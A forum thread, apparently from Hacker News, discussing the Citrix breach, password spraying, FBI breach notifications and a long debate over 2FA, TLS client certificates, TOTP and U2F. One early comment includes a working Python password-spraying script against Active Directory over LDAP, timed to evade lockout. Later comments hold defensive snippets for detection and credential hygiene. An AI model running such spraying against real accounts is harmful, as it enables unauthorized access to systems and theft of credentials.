> Citrix said in a later update on April 4 that the attack was likely a result of password spraying, which attackers use to breach accounts by brute-forcing from a list of commonly used passwords that aren’t protected with two-factor authentication.
Haven't read the article, don't know anything about their network. Assuming they use a Windows domain for their corp infrastructure.
Lower-level Windows authentication mechanisms can't be configured for 2FA. If your Active Directory domain is functional at all, then at the very least your systems need to be able to talk to a domain controller via SMB and LDAP. With sufficient privileges you're able to execute code on other machines via either protocol.
You only need an infected machine, not even user credentials, to be able to perform password spraying or kerberoasting attacks.
net commands, Kerberos tickets, etc. You can really only 2FA web interfaces, VPNs, RDP, and interactive console logons. You can 2FA LDAP, but it's a real pain to do so (I've seen it done).
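To make that concrete: here's a minimal sketch of the spray pattern as an LDAP bind, which no 2FA prompt ever interrupts. The domain controller hostname, user list, and passwords are all hypothetical, and it assumes the third-party ldap3 package. Defenders can run the same loop against their own domain to find weak passwords before an attacker does.

    # Password spraying sketch: one common password tried against many
    # accounts, pausing between rounds to stay under lockout thresholds.
    import time
    from ldap3 import Server, Connection, NTLM

    DC = "dc01.corp.example.com"          # hypothetical domain controller
    USERS = ["alice", "bob", "carol"]     # e.g. enumerated from the GAL
    COMMON_PASSWORDS = ["Spring2019!", "Company123"]

    server = Server(DC)
    for password in COMMON_PASSWORDS:     # outer loop: one password per round
        for user in USERS:                # inner loop: every account once
            conn = Connection(server, user=f"CORP\\{user}",
                              password=password, authentication=NTLM)
            if conn.bind():               # a plain NTLM bind; no second factor here
                print(f"valid credentials: {user}:{password}")
                conn.unbind()
        time.sleep(1800)                  # wait out the lockout observation window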
Just think of any backend protocol the system uses. The vast majority of those can't be 2FA'ed. This is not Windows-specific either; the same is true for almost all protocols.
This is why most companies buy firewalls and VPNs and only 2FA the VPN. That meets most compliance requirements and is simple to do. Is it secure? Probably not, but it checks the box (makes audit happy), so buy compromise insurance and move on.
I fully assume there are more hacks we don't hear about than ones we do. Not only because of cover-ups, but because it can't be that hard to cover your tracks if you know what you are doing.
Presumably the attacker has some external command and control infrastructure they must use to get in and out of Citrix's networks, which is presumably what the FBI was tracking.
THIS! My brother works for a large corp that does a lot of government (and private) work. A few years back, they tightened up their security with live monitoring, and as soon as it was enabled they realized that folks from China were actively connected. The FBI was involved, but it never made the news. 2-3 more attempts have been made since. While they have an idea how long they had been breached, they don't know for sure...
I assume you rather meant 'connections originating from IP addresses owned by Chinese companies'? It's trivial to use an IP address from any place in the world, regardless of your actual location.
I mean from China. It was investigated and pretty conclusively linked. Is there a chance that it wasn't China? Sure. But there were specific reasons China would want to know what this company was working on, and it was more than just an IP address cross-reference that pointed to them. Now don't read this as "US = good, China = bad"; that isn't what I'm saying here. I'm saying that Chinese state-sponsored hackers accessed their computer systems, with reasonably credible evidence.
Even more interesting: how did the FBI know they'd been infiltrated before they themselves did?
(There's the obvious conspiracy-style accusation that they were already in there poking around... but that doesn't seem to ring true in this regard.)
In the Marriott hack post-mortem, they shared that one of the tools they used (which successfully identified the attack) was IBM Guardium.
> Accenture told Marriott's IT staff that one of their security products, a database monitoring system called IBM Guardium, had detected an anomaly on the Starwood guest reservation database
Seeing large amounts of encrypted traffic leaving via a DNS tunnel during non-standard business hours, for instance, would be an example of such an anomaly. It's not always that easy to detect, however.
Simply storing netflow data and graphing it would show it at a glance. Use a machine set up as a transparent bridge with only physical login if you are paranoid about the netflow data being modified.
Hiding on a box is easy. Hiding on the wire is hard.
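As a rough illustration of the netflow idea: aggregate flows by hour and flag heavy DNS-bound traffic outside business hours. The record fields and threshold here are hypothetical; flows are assumed to be pre-parsed from whatever collector is in use (nfdump, softflowd, etc.).

    # Flag hours with suspiciously heavy DNS traffic outside business hours.
    from collections import defaultdict
    from datetime import datetime

    BUSINESS_HOURS = range(8, 19)          # 08:00-18:59 local
    DNS_PORT = 53
    THRESHOLD_BYTES = 50 * 1024 * 1024     # 50 MB of DNS in one hour is suspect

    def flag_dns_tunneling(flows):
        per_hour = defaultdict(int)
        for f in flows:                    # f: {"ts": epoch, "dport": int, "bytes": int}
            if f["dport"] == DNS_PORT:
                hour = datetime.fromtimestamp(f["ts"]).replace(
                    minute=0, second=0, microsecond=0)
                per_hour[hour] += f["bytes"]
        return [(hour, n) for hour, n in sorted(per_hour.items())
                if n > THRESHOLD_BYTES and hour.hour not in BUSINESS_HOURS]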
Correct me if I'm wrong, but Stuxnet was designed for a purpose and it accomplished that purpose. That it would eventually be discovered was no doubt understood by the authors.
Compare that to gaining unauthorized access to a machine and cleaning the logs behind you... One doesn't have to be more brilliant than the authors of Stuxnet to do something illegal without getting caught.
Given that the malware was seriously breaking shit, it wasn't all that hard to catch. I'm sure that at first they were looking for bugs, and then it became clear that it was too intentional.
That's the belief, but was it truly ever confirmed? I don't doubt it; it sounds like a meme worthy of belief and I lean towards it, but I don't recall ever finding a confirmation. Also, saying they were caught implies the law caught them and arrested them.
As far as I know Stuxnet didn't break any US/Israeli laws. Of course it broke Iranian laws, though.
I think Obama said "no comment" to reporters, but then basically admitted it by talking about how he regretted that this information got out into the public.
What would you consider confirmation? Without someone coming out and saying "we're the ones who did it", it's very unlikely that it'll ever be confirmed.
The best you can do is make some educated guesses (by looking at the timestamps, coding patterns, comments in the code, who might be interested in hacking the target, the political connotations of the attacks, etc.). That's usually how state-sponsored attacks get attributed.
For example, "Guccifer" used GTM+3 settings and attacked DNC a few hours after Trump publicly "hoped" that Russians will find the emails. That doesn't confirm that it was sponsored by Russia, but it makes it an educated guess.
It actually is not, if you follow a strict least-privilege model as the basis for your security architecture. But nobody does; not because it is hard, but because they don't understand it. Security is still based around looking for all the bad; it seems this defunct model will never die.
Has anyone gotten that kind of call from the FBI who can shed light on how the process works? It would be fascinating for an outsider, and would provide a guide on what next steps look like for those poor souls who receive the call in the future.
I've been on this call (both sides of it) probably a dozen times by now. Government agencies are decent at doing research, so it's pretty unlikely that the FBI just called their 1-800 number or whatever.
Most small start-ups don't get to the level where anyone that "big" is looking at them, but in the event that something does get flagged, the agency will go find their CEO/CTO/counsel on LinkedIn and either message them there or email them. I've never seen an actual vulnerability disclosed in email; if it's a potential legal issue (hello, SEC and fintech) they may ask that your lawyer respond to them in writing, but more often it's just "this is Agent XYZ with ABC. I have information about your company, please call me immediately."
For someone bigger (like Citrix), the company is hopefully big enough to have a team that is connected to the agencies in some way. Either the agency knows someone who knows them, or they have a designated security and compliance team that can handle these inquiries.
The real problems come when you're in the middle, size-wise: too big to have eyes on every email but too small to have a real security team.
About 5 years ago I was working for a SaaS company, and one of our clients accidentally discovered a pretty serious hole in another company's product. This client wasn't overly tech-savvy and was basically like "hey, is this how this is supposed to work?" when it very much was not... so we killed the API connection and told the client we'd take care of it. It was about 7pm ET by the time we figured out what was going on, so we called and emailed the other company but couldn't find anyone. In the end we got the home phone number of their CTO and had our CTO call him at around 10pm. He thought it was a prank call, but once our CTO convinced him this was a problem he was able to get their on-call engineer to patch it within hours.
Nowadays almost any company involved in security work either has a direct line to the FBI/DHS or has a vendor who does. I.e., if I'm some medium consumer platform I probably don't get to talk to the FBI directly, but if I called up CrowdStrike or any security consulting firm, they could do that. In the event that my medium consumer platform was infiltrated by Fancy Bear (and the government decided to tell me; sometimes they don't), an FBI agent would email/call the most likely point of contact for the fastest resolution without causing panic. Lots of times the damage is already done; two vs. four hours on a response won't make a big difference in the long term, so no need to email info@ or anything.
Over the past 6-8 years the cooperation on public/private cyber investigations has definitely changed, as red tape has decreased and sharing of info has increased, even more so in the last 4-ish years since the DNC email hacks. I've had clients get a casual "just a heads up, you should check this out" from the government with no paperwork and no follow-up, something that would have been virtually unheard of 8 years ago.
DHS gets a lot of shit in the media (lots of which is deserved) but they've done a pretty good job just opening basic lines of communication and training other agencies that spending 20 minutes looking at a random tip, and following up if needed, is actually a pretty good use of time.
Just want to plug InfraGard here, specifically because of your comment around cooperation: https://www.infragard.org/. Lots of good information (U//FOUO) is passed between various intelligence agencies and the private sector, which you can access once you are a member.
If you'd like a fuller perspective on the Citrix hack, three security people from Detroit discussed it on a recent episode of their show, How They Got Hacked:
Did you watch that? They mentioned that they don't know any more than what's been publicly disclosed about how the attack occurred, and that they were speculating. That was literally their first sentence about the attack.
I was going to say the same thing, but it sounds like it was the FBI that noticed it:
> [T]he hackers had “intermittent access” to its internal network from October 13, 2018 until March 8, 2019, two days after the FBI alerted the company to the breach.
This is extremely common. 6 months is not that long, even among competent companies that have good security. You usually hear about it from the FBI. I think the FBI forwards tips from agencies like the NSA, but they don’t tend to give much information.
It may be common, but I'll disagree that it's common for companies with "good security." Password spraying doesn't work against good 2FA, nor against sane login limits. I set off a flag any time someone logs in from a new IP, for example.
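A new-IP flag like that is only a few lines in whatever handles logins; a toy sketch (the store and the alert hook are stubbed out and entirely hypothetical):

    # Flag any login from a source IP not previously seen for that user.
    known_ips = {}   # user -> set of previously seen source IPs

    def check_login(user, source_ip, alert):
        seen = known_ips.setdefault(user, set())
        if source_ip not in seen:
            # e.g. page on-call, email the user, or require step-up auth
            alert(f"new source IP for {user}: {source_ip}")
            seen.add(source_ip)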
2FA and login limits alone aren't likely to stand in the way of state-sponsored hackers.
Lots of companies still haven't upgraded to zero trust / BeyondCorp AuthN, and lots of companies don't have reproducible signed build artifacts from CI/CD with automatic policy enforcement regarding the properties that those build artifacts must have before they can be deployed.
High-profile companies that think VPNs and networking rules are a security solution have probably already been hacked and just don't know it yet.
Citrix has had 2FA for logins outside the corporate network for years. They also lock your account after 3 consecutive failed login attempts (even internally).
Not saying Citrix security is perfect, but protecting yourself from this kind of attack is certainly not as simple as "Add 2FA and limit login attempts".
Having responded to multiple incidents across sectors, I can confirm that extensive reconnaissance and long-term operations are becoming the norm. During one instance, the attackers had been present in a client's systems for more than 18 months and had gained an amazing understanding of their operational procedures, policies, and security architecture, to say the least.
If you have anything of value, I absolutely guarantee you that there are hackers in your network right now.
One thing that frustrates me more than anything else is people assuming that their corporate network is safe. Your firewall and your VPC or whatever is a speed bump at best. You have to assume that you have an attacker at the desk right next to you, because eventually you will.
That's a really defeatist attitude. There are different levels of "value" and different levels of protection. Not everything is internet facing. Not everything is managed like a corp where turnover requires lots of access changes. Not everything allows you persistence in the network. And not all access is "access".
I really wish we'd move past the "everybody's owned" idea. Your defence should be proportional to the value you can lose. You can monitor for the rest. And you can't guarantee there are hackers in my network. (Unless you're saying you're guilty of breaking in? ;-) )
I don't think the grandparent says that everyone is owned, but that if your data is interesting enough, your threat model must include employees who are willingly exfiltrating data, sometimes for nation states, and that your first barriers are therefore assumed to be breached by those attackers.
This of course does not apply if you are not holding on to anything interesting, but it’s very easy to become interesting at a certain size, or if you have interesting customers. Still, not everybody.
Your threat exposure is not just your network. It's all of your customers and all of your vendors as well.
Recall that the Target POS hack back in 2014 happened because someone hacked the largest refrigeration contractor in western Pennsylvania, then bounced from there onto the Target Partners Online portal with legitimate credentials, and then from there in unspecified ways got onto the POS system. Obviously going from TPO to POS is a failure of Target's network security, but their network perimeter was much larger than just Target computers.
My response was triggered by "If you have anything of value". I agree with "if your data is interesting enough". Because let's be honest, barely any company qualifies for a nation state to embed a worker with them. If they do, they know. But everybody has something of value.
That phenomenon is worse in environments with lots of compliance, as the security people tend to think like auditors instead of security professionals.
You need a network sniffer and pattern recognition. Otherwise you're basically hoping some of the unusual activity will trip the IDS/IPS (or touch the internet). However, if it is a normal account, you need some sort of intelligence to recognize it and alert.
Throwaway, worked at Citrix. The unfortunate thing about this comment is that they sell Citrix Cloud as having the intelligence to detect anomalies exactly like this in your network.
Ouch. This page [0] hurts a little bit to read now. Feel free to grab their free ebook, though! You'll learn how advanced analytics can help IT identify user behaviors, determine risk profiles, and assess and address potential threats.
>Citrix said in a later update on April 4 that the attack was likely a result of password spraying, which attackers use to breach accounts by brute-forcing from a list of commonly used passwords that aren’t protected with two-factor authentication.
Wow. This simply reinforces the fact that humans cannot, and should not, be trusted with actively maintaining the security of a system, especially if there could be significant economic consequences.
Would a password manager help in this? I don't know.
Probably a hardware token which controls any and all access to a system.
I was with you up until the last paragraph, but no. That's not 2fa, that's switching one factor for another.
People should use a password manager with an RNG to generate and store passwords. IT departments should run password-spraying attacks themselves, as well as blacklist known-compromised passwords. There's really good tooling for this (likely the same tooling this adversary used!)
Separately from this, people should use hardware 2FA tokens whose weakest link isn't the cell phone company support.
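Both suggestions are easy to sketch. Below, Python's secrets module handles generation and the haveibeenpwned range API handles the known-compromised check; the API endpoint is real (and only the first five hex chars of the SHA-1 ever leave the machine), everything else is illustrative.

    import hashlib
    import secrets
    import string
    import urllib.request

    def generate_password(length=24):
        # CSPRNG-backed generation, as a password manager would do.
        alphabet = string.ascii_letters + string.digits + string.punctuation
        return "".join(secrets.choice(alphabet) for _ in range(length))

    def is_compromised(password):
        # k-anonymity lookup: send a 5-char SHA-1 prefix, match suffixes locally.
        digest = hashlib.sha1(password.encode()).hexdigest().upper()
        prefix, suffix = digest[:5], digest[5:]
        url = f"https://api.pwnedpasswords.com/range/{prefix}"
        with urllib.request.urlopen(url) as resp:
            body = resp.read().decode()
        return any(line.split(":")[0] == suffix for line in body.splitlines())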
> People should use a password manager with an RNG to generate and store passwords.
[...]
> Separately from this, people should use hardware 2FA tokens whose weakest link isn't the cell phone company support.
What would be better is to support certificate based authentication in combination with a username and password. Then you have 2FA without having to share the private key. You can even get 3FA if the private key requires a passphrase to decrypt it.
Using SMS- or email-based 2FA is not secure (or rather, it is only as secure as the email or cell phone account, as you already pointed out). Using TOTP requires sharing a secret between the device and the server.
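For anyone unfamiliar with why TOTP implies a shared secret: both sides run the same keyed computation, so a compromise of the server's copy is as bad as a compromise of the device. A minimal RFC 6238 sketch, stdlib only (the example secret is a placeholder that appears in many TOTP docs):

    import base64, hashlib, hmac, struct, time

    def totp(secret_b32, period=30, digits=6):
        # Same symmetric key on client and server; HMAC over the time counter.
        key = base64.b32decode(secret_b32)
        counter = struct.pack(">Q", int(time.time()) // period)
        mac = hmac.new(key, counter, hashlib.sha1).digest()
        offset = mac[-1] & 0x0F                        # dynamic truncation
        code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
        return str(code % 10 ** digits).zfill(digits)

    print(totp("JBSWY3DPEHPK3PXP"))  # both ends must produce this same code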
A passphrase doesn't make it 3FA, since that's an already-used factor class: what you know. 3FA is one from each category: what you know, what you have, and what you are. Depending on the implementation, what you describe may only be 1.5-factor auth.
I believe we can agree that just using a username/password for authentication is 1FA (single factor authentication). If we add a one-time token sent via SMS or email, or generated via TOTP, that's generally considered 2FA (with the username/password considered what you know and the one time token being what you have, I believe).
What I proposed was using a client-side TLS certificate in combination with the username/password for authentication. If the private key corresponding to that certificate requires a passphrase to decrypt, then it should be more than 2FA. What you know is the username/password, what you have is the private key. Whether the passphrase for that private key is considered what you know vs what you are is debatable (since, unlike the username/password or one-time token, the secret isn't shared by transmitting it over the network).
Many security people will discount everything someone says once they see that person misapply marketing phrases to describe security technology.
2FA does not become 3FA when adding a new passphrase to a system that already had a knowledge based entry.
A password for a private key is _never_ considered what you are. You are severely misusing security terms and will mislead people to believe that a proposed solution has greater strength than it really possesses.
> [You] will mislead people to believe that a proposed solution has greater strength than it really possesses.
Then explain how authentication via a username and password validated server-side, a client-side TLS certificate validated during the negotiation of the TLS connection between client and server, and a passphrase validated locally on the client's device is not a better solution than typical 2FA implementations using email, SMS, or TOTP.
Key-logger on the box your soft cert is on. Soft cert is compromised immediately, fully, and permanently. And you might never know. With email/SMS, at least it's possible for you to realize they're compromised, and with TOTP the underlying keymat is likely not on the device so the attacker has to repeatedly win the race.
More importantly, this is also a false dichotomy, as the correct answer here is hardware protection of the private key, e.g. yubikey.
> Key-logger on the box your soft cert is on. Soft cert is compromised immediately, fully, and permanently.
That essentially means the entire machine is compromised, and logging into any service would allow the adversary to access it. That would compromise the email and SMS routes as well. If they have root access to my phone (or whatever I use to store the TOTP secret), that would allow them to generate the correct one-time token to log into any service that I use TOTP 2FA with.
> With email/sms, at least it's possible for you to realize they're compromised
That's assuming I check carefully and often enough. If someone brute-forces my password over IMAP, then they could read my messages without me ever knowing. But I could always check the process list on my computer to determine if a keylogger is installed.
> and with TOTP the underlying keymat is likely not on the device so the attacker has to repeatedly win the race.
It depends on the application. If someone got access to my phone, they could easily get the TOTP secret out of my GAuth app.
> the correct answer here is hardware protection of the private key, e.g. yubikey.
Except that it's not universally supported. It's not going to work with my email client nor will it work with my IRC client.
Basically, the ability for someone to log into my account by brute forcing or obtaining my credentials or being able to bypass the log on process by using the conventional second auth factor against me (by doing the same thing to my email account and/or my cell phone provider).
While U2F, as mentioned in other posts, will protect against those scenarios, it doesn't appear to support application protocols other than HTTPS.
>> Basically, the ability for someone to log into my account by brute forcing or obtaining my credentials
If that is the threat you are guarding against, that is the very reason for using different factors. In that way, you ensure that people cannot log in with credentials, even if they have them.
In the same way, an ATM card cannot get you money, even if you stole it. In the case of an ATM card and a PIN, you need two factor classes: what you have and what you know.
Regarding the other part of your prior comment that incorrectly used 2FA, that is why Apple uses the terms separately, "two factor auth" and "two step auth". They are not the same.
>> Basically, the ability for someone to log into my account by brute forcing or obtaining my credentials
> you ensure that people cannot log in with credentials, even if they have them.
Except that you left out the second part of that sentence:
>> or being able to bypass the log on process by using the conventional second auth factor against me (by doing the same thing to my email account and/or my cell phone provider).
In that case, the person was a victim of a SIM swap scam which redirected password reset messages to the attacker's cell phone, which then allowed them to access the account.
Regardless of how I initially termed it, having another factor that lives locally on the device one is using, rather than a 3rd-party service that can be compromised in a way you may not immediately notice, is a far better way of doing multi-factor or multi-step auth.
But this solution should not be limited to just the HTTP application-level protocol. It should also be available for other application-level protocols (IMAP, SMTP, NNTP, IRC, etc.). That means that U2F needs to account for this, or we need broader support for using client-side TLS certificates as part of the authentication process.
When technical security items have been pointed out repeatedly to you, you keep answering without addressing those security points. A valid security design should understand the threats that are being guarded against instead of simply throwing out a favored design.
It seems that you're fixated on the terms used in the discussion rather than the substance of the discussion itself. I already provided an example where someone fell victim to the SIM swap scam because they had their cell phone number on file with their bank.
But rather than addressing the issues where a 3rd party serving as a second factor/step can be compromised without the account holder realizing it in time, or the fact that U2F doesn't support other protocols besides HTTPS, you keep going on and on about "security points" which appear to be nebulous in the context of this discussion, and you cherry-pick my responses only to go off on a largely irrelevant tangent.
This discussion could have been useful, but, unfortunately, it didn't turn out that way.
You misunderstand. I am not fixating on the terms, but on the concept underlying the factors of identification. The point, which I stated in my first comment, is that you are not taking into consideration the difference between 1.5-factor auth and 2-factor auth. Then you are further compounding the security error by discussing other issues instead of directly addressing that your solution doesn't address the threat model. That is why I asked what threats you are guarding against. There is a large body of knowledge here that may be worth your study; cf. the CIA triad.
Yes, there is a fixation on security, since authentication is a security function that is often gotten wrong when people don't know the threat model and rush through a solution. This has been pointed out to you by several people more than once in this very thread.
FIDO/U2F is only supported in certain places. What I'm talking about is supported by any server that supports TLS. For instance, news.ycombinator.com is running nginx, and nginx supports client-side TLS certificates. If the administrators of this website chose to enable it, they could allow me to submit a certificate signing request, sign it, and send me the resulting certificate. Then they could allow me to connect to this server using that certificate to authenticate me, in addition to my username and password.
Also, this isn't tied to a specific application-level protocol. This can be done over other application-level protocols like SMTP, IMAP, NNTP, IRC, etc.
From what I've read about U2F[1], you need to use Google Chrome. Just checking the preferences/settings for both Firefox and Chrome, they both have the option of importing client side TLS certificates. Thunderbird also has the option of importing client side TLS certificates.
To put it another way, my browser can tell it's connecting to news.ycombinator.com by using the certificate authority bundle installed on my machine. I don't need any external service or new standard to accomplish this. The same principle applies to client-side TLS certificates.
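And the client-certificate machinery really is protocol-agnostic. A hedged sketch with Python's ssl module against a hypothetical IMAPS host; the server must of course be configured to request and verify client certificates:

    import socket
    import ssl

    ctx = ssl.create_default_context()
    # If client.key is passphrase-protected, pass password=... here;
    # that passphrase is the locally verified "what you know" layer
    # discussed above. Paths are hypothetical.
    ctx.load_cert_chain(certfile="client.crt", keyfile="client.key")

    with socket.create_connection(("imap.example.com", 993)) as raw:
        with ctx.wrap_socket(raw, server_hostname="imap.example.com") as tls:
            # Mutual TLS is established before a single IMAP command is sent.
            print(tls.version())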
First, mutual auth with certs as you suggest isn't supported by "all servers which support TLS". Second, even if it were, you have either a serious management headache dealing with arbitrary unsigned keys from end users or a huge management headache dealing with CSRs securely.
Third, yubikey is not only supported by chrome. I've used it with IE and Firefox just now to verify.
Fourth, yubikeys provide significant additional security as you cannot lose control of the private key without realizing it, even if your box is owned. The yubikey requires you to physically press a button to approve any action it takes with the private key. Soft certs are gone once they're decrypted in RAM (there's automation for this exact thing in many RATs).
Source: NIST has advocated for mutual auth with PIV for over a decade. They are now moving away from it and towards WebAuthn, because mutual auth with certs is simply not as good.
> you have either a serious management headache dealing with arbitrary unsigned keys
Once the user installs the certificate, their browser would use it during the TLS handshake. If the signature couldn't be verified, then the connection wouldn't be established, or it could be established but without the client-side TLS part (depending on how the webserver is configured). The login attempt could then be rejected because the client-side TLS negotiation never took place.
> huge management headache dealing with CSRs securely.
Let's take a website like news.ycombinator.com. When I click on the login link, it gives me the option to provide credentials or create a new account. If I choose to create a new account, I'm asked to provide a new username and password. They could add a field that would allow me to submit a CSR along with an email address they could email the signed certificate to.
Then I could get the certificate by email, import it into my browser and then use it along with the new username and password to log in with my new account.
For equivalent online accounts, a workflow like that should be good enough.
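For what it's worth, that signup field would carry a standard PKCS#10 CSR; a sketch of the user's side with the third-party cryptography package (the common name is hypothetical). The site signs this and mails back the certificate; the private key never leaves the user's machine.

    from cryptography import x509
    from cryptography.hazmat.primitives import hashes, serialization
    from cryptography.hazmat.primitives.asymmetric import rsa
    from cryptography.x509.oid import NameOID

    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    csr = (
        x509.CertificateSigningRequestBuilder()
        .subject_name(x509.Name([
            x509.NameAttribute(NameOID.COMMON_NAME, "new-user"),
        ]))
        .sign(key, hashes.SHA256())
    )
    # PEM text to paste into (or POST from) the signup form.
    print(csr.public_bytes(serialization.Encoding.PEM).decode())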
> Third, yubikey is not only supported by chrome. I've used it with IE and Firefox just now to verify.
They should update their website. The link I cited earlier still has the following quote:
>> What browsers support the U2F-certified Yubikeys?
>> You must be running the latest version of the Google Chrome browser, which includes support for the U2F protocol. To check the version number, in your browser, click the Chrome menu in the toolbar, then select About Google Chrome. (Support for U2F is in versions 38 and later.)
>> At this time, Chrome is the only browser supported. However, Mozilla is currently building support for U2F and Microsoft is working within the FIDO Alliance to eventually bring support to Windows 10.
> Fourth, yubikeys provide significant additional security as you cannot lose control of the private key without realizing it, even if your box is owned. The yubikey requires you to physically press a button to approve any action it takes with the private key. Soft certs are gone once they're decrypted in RAM (there's automation for this exact thing in many RATs).
While this is true, is this something that I can currently use with my email/news client? What about my IRC client? I know that I can use client side TLS certificates with both.
> They are now moving away from it and towards WebAuthn, because mutual auth with certs is simply not as good.
What do they plan to do to address more secure authentication over other protocols besides HTTPS?
Probably my wording was wrong. I was thinking more of a system where the password itself is generated and stored on a hardware device. The user need not interact with any application whatsoever, like 1Password or LastPass, to generate or store a password. Everything happens behind the scenes on the device. The user would be responsible only for keeping the hardware device safe.
This probably makes 2FA moot for some scenarios. For scenarios where losing the token is a real risk, you would implement 2FA.
I understood you; my point is that you are sacrificing significant security with a one-factor approach, especially if that one factor is a password! You're open to attacks where the password is exposed in between the keyboard and the requestor, attacks on the distant end system, as well as attacks on the password device itself. Passwords make it tricky to audit if they've been duplicated.
Use 2FA everywhere. It's cheap, easy, and significantly more effective.
Consider the following attacks, which your suggestion provides no coverage for:
- HTTP downgrade (both SSLstrip and export-grade downgrade)
- Spear-phish
- Key-logger
- Spear-phish
- Shoulder-surf
- Spear-phish
- Evil maid (borrows device and compromises passwords)
I don't believe spear-phishing would get past a hardware password token. The device would be responsible for authenticating the identity of the service being accessed. And if the user can be fooled into handing over their hardware password token, I don't find it far-fetched that they could also be fooled into handing over their 2FA token.
Again, if a hardware 2FA token can deal with key-loggers, so can a password token.
Why would someone be able to shoulder-surf a display-less password token? You log on to the website, insert the device, and the website proceeds to authentication without revealing anything.
Evil maid is the only legitimate attack I can agree with.
>attacks on the distant end system, as well as attacks on the password device itself.
This is not something a hardware 2FA token is foolproof against either.
>Passwords make it tricky to audit if they've been duplicated.
This is a valid point.
My point may not be applicable to super-sensitive systems, but for a lot of services it should be sufficient. I'm saying so because I'm having a hard time getting my family/friends to use a password manager (specifically 1Password). They do not see the need, find it additionally complex, and are turned off by the subscription pricing (I'm paying for my family though!). Syncing is also hard. I was hoping that a pure hardware token would make it more convenient, and a one-time 20-40 USD price is more palatable than 60 USD every year.
Ha. Perfect. That is exactly what I was imagining. Apologies for the long conversation.
Do you have any idea why this is not popular? Is it too hard to implement, or is it just that businesses do not see security as something to invest a lot in?
Most major SaaS apps support it; the major hardware provider I see recommended is YubiKey, although Google makes one as well. See also U2F. It's super easy to implement; try it out for yourself in Flask.
Indeed. I spent 10 or 15 minutes trying to figure out if they are selling a physical device, like a USB 'key', or just selling 2-factor authentication with mobile phones. And I'm still none the wiser. It's pages upon pages of buzzwords and nonsense.
2FA only helps if it's a 2-way authentication mechanism like U2F.
TOTP codes are completely phishable using ridiculously easy-to-set-up kits like CredSniper [0]. Set up a MITM proxy authentication site, get the user to live-authenticate through the proxy, steal the session cookie, game over.
Some of the feedback that has come out of internal campaigns has been things like "I thought the URL looked weird, but the email said it was a beta site, and I got the Duo push notification for the second factor so it seemed legitimate."
That's the real danger of 2FA mechanisms outside of U2F: people believe they protect against phishing, and they absolutely do not.
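The reason U2F is the exception is that the device's signature covers the origin the browser actually visited, not just the server's challenge, so a code relayed through a look-alike proxy fails verification. A toy sketch of that binding, with HMAC standing in for the device's per-site key pair (all names hypothetical):

    import hashlib, hmac

    DEVICE_KEY = b"per-site-secret"   # real U2F mints an asymmetric key per origin

    def device_sign(challenge, origin):
        # The browser, not the user, supplies the origin string.
        return hmac.new(DEVICE_KEY, challenge + origin.encode(), hashlib.sha256).digest()

    def server_verify(challenge, signature):
        expected = device_sign(challenge, "https://real-site.example")
        return hmac.compare_digest(expected, signature)

    chal = b"nonce-123"
    assert server_verify(chal, device_sign(chal, "https://real-site.example"))
    # The phished flow: the browser was really on the proxy's origin, so it fails.
    assert not server_verify(chal, device_sign(chal, "https://evil-proxy.example"))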
This is dangerously untrue; while TOTP is clearly not as secure as a hardware token, it's much more secure than just a username/password. It requires the adversary to do more work, and it also provides more clues for the server that something phishy is going on. It's also much easier to sell to users, especially for free-but-critical services like webmail. You're not going to convince everyone to buy a $30 hardware token to protect their free Gmail account; meet your users where they are.
By all means, move towards a hardware-based 2FA setup. But don't let that prevent intermediate steps that improve security along the way.
Your example is also deeply flawed, as it can be used to steal auth tokens for 2FA sites even if they use FIDO. MITM is game over.
How did Citrix not have 2FA in place?